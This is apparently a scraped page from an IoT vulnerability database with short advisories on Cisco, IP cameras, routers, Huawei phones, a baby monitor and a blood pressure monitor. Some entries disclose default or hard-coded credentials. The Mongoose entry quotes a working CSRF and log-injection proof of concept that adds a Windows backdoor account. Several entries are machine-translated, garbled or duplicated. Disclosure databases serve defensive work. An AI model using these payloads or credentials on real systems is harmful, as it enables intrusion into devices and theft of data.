VARIoT IoT vulnerabilities database

A vulnerability in the Autonomic Networking feature of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, adjacent attacker to reset the Autonomic Control Plane (ACP) of an affected system and view ACP packets that are transferred in clear text within an affected system, an Information Disclosure Vulnerability. More Information: CSCvd51214. Known Affected Releases: Denali-16.2.1 Denali-16.3.1. Vendors must Bug ID CSCvd51214 It is published as.Information may be obtained. Cisco IOS is the interconnected network operating system used on most Cisco system routers and network switches. Successful exploit will allow attackers to view ACP packets in clear-text or cause denial-of-service conditions. This may result in further attacks

A vulnerability in the web-based management interface of the Cisco Secure Access Control System (ACS) could allow an authenticated, remote attacker to conduct a stored cross-site scripting (XSS) attack against a user of the web interface of the affected system. More Information: CSCve70587. Known Affected Releases: 5.8(0.8) 5.8(1.5). Vendors have confirmed this vulnerability Bug ID CSCve70587 It is released as.Information may be obtained and information may be altered. Successful exploits will result in the execution of arbitrary attacker-supplied HTML and script code in the context of the affected application, potentially allowing the attacker to steal cookie-based authentication credentials or control how the page is rendered to the user. Other attacks are also possible. This issue is being tracked by Cisco Bug ID CSCve70587. The system can respectively control network access and network device access through RADIUS and TACACS protocols

An issue was discovered on Wireless IP Camera 360 devices. Remote attackers can discover RTSP credentials by connecting to TCP port 9527 and reading the InsertConnect field. 360WirelessIPCamera is a network camera product from Qihu360 of China. There is a security hole in 360WirelessIPCamera

An issue was discovered on Wireless IP Camera 360 devices. Attackers can read recordings by navigating to /mnt/idea0 or /mnt/idea1 on the SD memory card. 360WirelessIPCamera is a network camera product from Qihu360 of China. There is a security hole in 360WirelessIPCamera

An issue was discovered on Wireless IP Camera 360 devices. Remote attackers can discover a weakly encoded admin password by connecting to TCP port 9527 and reading the password field of the debugging information, e.g., nTBCS19C corresponds to a password of 123456. Wireless IP Camera 360 The device contains a vulnerability related to the use of hard-coded credentials.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. 360WirelessIPCamera is a network camera product from Qihu360 of China. There is a security hole in 360WirelessIPCamera

An issue was discovered on Wireless IP Camera 360 devices. A root account with a known SHA-512 password hash exists, which makes it easier for remote attackers to obtain administrative access via a TELNET session. Wireless IP Camera 360 The device contains vulnerabilities related to certificate and password management.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. 360WirelessIPCamera is a network camera product from Qihu360 of China

Cross-site scripting (XSS) vulnerability in the Alert Service of Cisco Cloud Web Security base revision allows remote attackers to inject arbitrary web script or HTML via unspecified parameters. Alert Service is one of the early warning services

ZyXEL PK5001Z devices have zyad5001 as the su password, which makes it easier for remote attackers to obtain root access if a non-root account password is known (or a non-root default account exists within an ISP's deployment of these devices). ZyXEL PK5001Z The device contains vulnerabilities related to certificate and password management.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. ZyXELPK5001Zdevices is a wireless switch device from China's He Qin Technology. A security vulnerability exists in ZyXELPK5001Zdevices that allows remote attackers to exploit a vulnerability to submit a special request for root access. There is a security vulnerability in the ZyXEL PK5001Z device

The TP-LinkPTWR841NV8 is a wireless router. There is a logic vulnerability in the TP-LinkPTWR841NV8 router configuration service. Due to the logical flaws of the router, it is possible to reset the device's credentials and get code execution through a stack overflow vulnerability in the service. Attackers can also use vulnerabilities to modify router settings to reroute traffic to a malicious server.

The HP OfficeJet Pro 8210 is an all-in-one printer from Hewlett Packard. A remote command execution vulnerability exists in HP printers. Allows an attacker to exploit a vulnerability to execute arbitrary code.

UTStarcom provides suppliers of broadband DSLAM and DSDSLMS hardware for managing DSL through PPPoE, PPPoA and other modes. The BAS1000 provides service management for broadband and narrowband from a single platform. There is a security hole in UTstarcomWA3002G4. An attacker could exploit the vulnerability to access the sites and devices of a vulnerable system and redirect to a malicious site.

MEDHOST Connex contains hard-coded credentials that are used for customer database access. An attacker with knowledge of the hard-coded credentials and the ability to communicate directly with the database may be able to obtain or modify sensitive patient and financial information. Connex utilizes an IBM i DB2 user account for database access. The account name is HMSCXPDN. Its password is hard-coded in multiple places in the application. Customers do not have the option to change this password. The account has elevated DB2 roles, and can access all objects or database tables on the customer DB2 database. This account can access data through ODBC, FTP, and TELNET. Customers without Connex installed are still vulnerable because the MEDHOST setup program creates this account. MEDHOST Connex Contains a vulnerability in the use of hard-coded credentials.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state

The call module of P10 and P10 Plus smartphones with software versions before VTR-AL00C00B167, versions before VTR-TL00C01B167, versions before VKY-AL00C00B167, versions before VKY-TL00C01B167 has a DoS vulnerability. An attacker may trick a user into installing a malicious application, and the application can send given parameter to call module to crash the call and data communication process. HuaweiP10 and P10Plus are both Huawei's smartphone products. Callmodule is one of the call modules. A denial of service vulnerability exists in the talk module in HuaweiP10 and P10Plus

The call module of P10 and P10 Plus smartphones with software versions before VTR-AL00C00B167, versions before VTR-TL00C01B167, versions before VKY-AL00C00B167, versions before VKY-TL00C01B167 has a DoS vulnerability. An attacker may trick a user into installing a malicious application, and the application can send given parameter to call module to crash the call and data communication process. HuaweiP10 and P10Plus are both Huawei's smartphone products. Callmodule is one of the call modules. A denial of service vulnerability exists in the talk module in HuaweiP10 and P10Plus

Honor 5A,Honor 8 Lite,Mate9,Mate9 Pro,P10,P10 Plus Huawei smartphones with software the versions before CAM-L03C605B143CUSTC605D003,the versions before Prague-L03C605B161,the versions before Prague-L23C605B160,the versions before MHA-AL00C00B225,the versions before LON-AL00C00B225,the versions before VTR-AL00C00B167,the versions before VTR-TL00C01B167,the versions before VKY-AL00C00B167,the versions before VKY-TL00C01B167 have a resource exhaustion vulnerability due to configure setting. An attacker tricks a user into installing a malicious application, the application may turn on the device flash-light and rapidly drain the device battery. plural Huawei Smartphone software contains a resource management vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. HuaweiP9 and other are all Huawei smartphones from China. There are resource consumption vulnerabilities in various Huawei phones. Huawei Honor Play 5A, etc. are all smartphone products of the Chinese company Huawei. The following products and versions are affected: Huawei Honor Play 5A CAM-L03C605B143CUSTC605D003 and earlier versions; Honor 8 Youth Edition Prague-L03C605B161 and earlier Prague-L23C605B160 versions; Mate9 MHA-AL00C00B225 and earlier versions; Mate9 Pro LON-AL00C00B225 Versions before; P10 VTR-AL00C00B167 and VTR-TL00C01B167; P10 Plus VKY-AL00C00B167 and VKY-TL00C01B167

The D-Link EyeOn Baby Monitor (DCS-825L) 1.08.1 has multiple command injection vulnerabilities in the web service framework. An attacker can forge malicious HTTP requests to execute commands; authentication is required before executing the attack. The EyeOnBabyMonitorDCS-825L is a baby monitor from D-Link. # Vulnerability Type Command Injection # Affected Product Code Base DCS-825L EyeOn Baby Monitor - 1.08.1 # Affected Component web service framework # Attack Type Remote ------------------------------------------ # Attack Vectors Send a crafted HTTP request # Discoverer Dove Chiu (Trend Micro) # Vulnerability Detail We found that parts of the web framework are written in shell scripts. Additionally, upon reviewing the files, we found that parts of the variables can be controlled from user input. Fortunately, the web server uses basic authentication first, before anyone can access any webpage Reference: https://documents.trendmicro.com/assets/tech_brief_Device_Vulnerabilities_in_the_Connected_Home2.pdf # Status Fixed in the latest beta firmware <table class="TM_EMAIL_NOTICE"><tr><td><pre> TREND MICRO EMAIL NOTICE The information contained in this email and any attachments is confidential and may be subject to copyright or other intellectual property protection. If you are not the intended recipient, you are not authorized to use or disclose this information, and we request that you notify us by reply mail or telephone and delete the original message from your mail system. </pre></td></tr></table>

Cross-site request forgery (CSRF) vulnerability in Mongoose Web Server before 6.9 allows remote attackers to hijack the authentication of users for requests that modify Mongoose.conf via a request to __mg_admin?save. NOTE: this issue can be leveraged to execute arbitrary code remotely. Exploiting this issue may allow a remote attacker to perform certain unauthorized actions and gain access to the affected application. Other attacks are also possible. Mongoose Web Server prior to 6.9 are vulnerable. It is a multi-protocol embedded networking library with functions including TCP, HTTP client and server, WebSocket client and server, MQTT client and broker and much more. However, IF Mongoose web server is installed as service then executing programs e.g. "calc.exe" may at times crash or fail to appear, but you may see it in Windows taskmgr.exe. Therefore, from my tests commands may become unstable when Mongoose is run as a service. When Mongoose is run standard mode attackers can potentially modify "Mongoose.conf" and create arbitrary files on server like .PHP etc. to point Mongoose to this as its new "index" file. Then you need to tell Mongoose its "access_log_file" is the new attacker generated file, after injecting commands into Mongoose web servers log file that will get excuted when log file is later requested. This vulnerability requires CGI interpreter to be already set or some information about the target is known like the CGI path and language "pl,php,cgi" used, so when we can set to use correct programming language when file is created during initial CRSF attack. Note: If running commands with arguments, we have to use "\t" tab chars as using space will break our TELNET based code injection to the server log. e.g. GET<?php exec("cmd.exe\t/c\tnet\tuser\tHACKER\tabc123\t/add");?> HTTP/1.1 OR just TELNET to Mongoose web server, inject arbitrary commands, then call exec by making another TELNET HTTP GET. # For detailed description of every option, visit # https://github.com/cesanta/Mongoose # Lines starting with '#' and empty lines are ignored. # To make a change, remove leading '#', modify option's value, # save this file and then restart Mongoose. # access_control_list access_log_file C:\Mongoose.access.php <======= BOOM # auth_domain mydomain.com cgi_interpreter c:\xampp\php\php.exe <====== MUST BE SET # cgi_pattern **.cgi$|**.pl$|**.php$ # dav_auth_file # dav_root # debug 0 document_root C:\ # enable_directory_listing yes # error_log_file # extra_headers # extra_mime_types # global_auth_file # hide_files_patterns # hexdump_file index_files Mongoose.access.php <======== BOOM # listening_port 8080 # run_as_user # ssi_pattern **.shtml$|**.shtm$ # ssl_certificate # ssl_ca_certificate # start_browser yes # url_rewrites Mongoose log file Command Inject to create backdoor. ----------------------------------------------------------- 2017-07-24 03:12:40 - 127.0.0.1 127.0.0.1:8080 GET /__mg_admin 200 5234 - 2017-07-24 03:12:40 - 127.0.0.1 127.0.0.1:8080 GET /__mg_admin 200 5234 - 2017-07-24 03:12:30 - 127.0.0.1 - GET<?php exec("cmd.exe\t/c\tnet\tuser\tHACKER\tabc123\t/add");?> 400 0 - 2017-07-24 03:12:40 - 127.0.0.1 127.0.0.1:8080 GET /__mg_admin 200 5234 - 2017-07-24 03:12:40 - 127.0.0.1 127.0.0.1:8080 GET /__mg_admin?get_settings 200 4294967295 http://127.0.0.1:8080/__mg_admin 2017-07-24 03:12:40 - 127.0.0.1 127.0.0.1:8080 GET /__mg_admin?get_cfg_file_status 200 4294967295 http://127.0.0.1:8080/__mg_admin 2017-07-24 03:12:40 - 127.0.0.1 127.0.0.1:8080 GET /favicon.ico 404 0 - Tested Windows 7. Exploit/POC: ============= 1) add backdoor account POC. <form action="http://127.0.0.1:8080/__mg_admin?save" method="post"> <input type="hidden" name="access_log_file" value="Mongoose.access.php"> <input type="hidden" name="cgi_pattern" value="**.cgi$|**.pl$|**.php"> <input type="hidden" name="index_files" value="Mongoose.access.php"> <input type="hidden" name="cgi_interpreter" value="c:\xampp\php\php.exe"> <script>document.forms[0].submit()</script> </form> 2) TELNET x.x.x.x 8080 GET<?php exec("cmd.exe\t/c\tnet\tuser\tHACKER\tabc123\t/add");?> HTTP/1.1 Enter Enter TELNET x.x.x.x 8080 GET / HTTP/1.1 Enter Enter Done, backdoor added! ==================== 1) run calc.exe POC. <form action="http://127.0.0.1:8080/__mg_admin?save" method="post"> <input type="hidden" name="cgi_pattern" value="**.cgi$|**.pl$|**.exe"> <input type="hidden" name="index_files" value="../../../../../../Windows/system32/calc.exe"> <input type="hidden" name="cgi_interpreter" value="../../../../../../Windows/system32/calc.exe"> <script>document.forms[0].submit()</script> </form> 2) TELNET x.x.x.x 8080 GET / HTTP/1.1 Enter Enter Network Access: =============== Remote Severity: ========= Medium Disclosure Timeline: ================================= Vendor Notification: July 23, 2017 Vendor Notification: July 28, 2017 Vendor Acknowledgement: July 31, 2017 Vendor Fixed released version 6.9 : September 4, 2017 September 4, 2017 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx

On Cisco DDR2200 ADSL2+ Residential Gateway DDR2200B-NA-AnnexA-FCC-V00.00.03.45.4E and DDR2201v1 ADSL2+ Residential Gateway DDR2201v1-NA-AnnexA-FCC-V00.00.03.28.3 devices, there is directory traversal in the filename parameter to the /download.conf URI. A directory traversal vulnerability exists in the Cisco DDR2200ADSL2+ReviewentialGatewayDDR2200B-NA-AnnexA-FCC-V00.00.03.45.4E and DDR2201v1ADSL2+ResidentialGatewayDDR2201v1-NA-AnnexA-FCC-V00.00.03.28.3 releases. An attacker could exploit this vulnerability to download arbitrary system files by sending a 'pingAddr' parameter with a shell metacharacter to waitPingqry.cgiURL. Multiple Cisco ADSL Routers are prone to a directory-traversal vulnerability. Remote attackers can use specially crafted requests with directory-traversal sequences ('../') to read arbitrary files in the context of the application. This may aid in further attacks

In the most recent firmware for Blipcare, the device provides an open Wireless network called "Blip" for communicating with the device. The user connects to this open Wireless network and uses the web management interface of the device to provide the user's Wi-Fi credentials so that the device can connect to it and have Internet access. This device acts as a Wireless Blood pressure monitor and is used to measure blood pressure levels of a person. This allows an attacker who is in vicinity of Wireless signal generated by the Blipcare device to easily sniff the credentials. Also, an attacker can connect to the open wireless network "Blip" exposed by the device and modify the HTTP response presented to the user by the device to execute other attacks such as convincing the user to download and execute a malicious binary that would infect a user's computer or mobile device with malware. There is a security flaw in the Blipcare device. Remote attackers can use this vulnerability to sniff credentials, modify HTTP responses, and perform other attacks (for example, tricking users into downloading and executing malicious binary files)

It was discovered as a part of the research on IoT devices in the most recent firmware for Blipcare device that the device allows to connect to web management interface on a non-SSL connection using plain text HTTP protocol. The user uses the web management interface of the device to provide the user's Wi-Fi credentials so that the device can connect to it and have Internet access. This device acts as a Wireless Blood pressure monitor and is used to measure blood pressure levels of a person. This allows an attacker who is connected to the Blipcare's device wireless network to easily sniff these values using a MITM attack. There is a security flaw in the Blipcare device